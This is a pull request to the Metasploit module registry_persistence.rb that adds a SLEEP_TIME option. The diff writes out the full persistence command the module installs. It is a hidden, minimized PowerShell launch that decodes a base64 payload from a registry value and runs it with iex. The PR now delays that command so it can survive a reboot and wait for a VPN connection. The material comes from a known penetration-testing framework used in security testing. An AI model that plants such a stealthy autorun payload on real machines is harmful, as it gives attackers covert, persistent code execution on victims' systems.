### PR TITLE
Added a SLEEP_TIME option

### DIFF
--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -53,6 +53,8 @@ class Metasploit4 < Msf::Exploit::Local
         [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
       OptBool.new('CREATE_RC',
         [false, 'Create a resource file for cleanup', true]),
+      OptString.new('SLEEP_TIME',
+        [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
     ], self.class)
   end
 
@@ -66,7 +68,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def generate_cmd(root_path, blob_key_name, blob_key_reg)
-    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
+    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"sleep #{datastore['SLEEP_TIME'].to_i}; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
     return cmd
   end
 

--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -53,7 +53,7 @@ class Metasploit4 < Msf::Exploit::Local
         [false, 'The name to use for the \'Run\' key. (Default: random)' ]),
       OptBool.new('CREATE_RC',
         [false, 'Create a resource file for cleanup', true]),
-      OptString.new('SLEEP_TIME',
+      OptInt.new('SLEEP_TIME',
         [false, 'Amount of time to sleep (in seconds) before executing payload. (Default: 0)', 0]),
     ], self.class)
   end


### PR DESCRIPTION
Added a SLEEP_TIME options which is the number of seconds to sleep prior to executing the initial IEX request. This is useful in cases where a machine would have to establish a VPN connection, initiated by the user, after a reboot. 

Alternatively, as opposed to a sleep time, the module could loop and attempt to retry the IEX request for a period of time. 
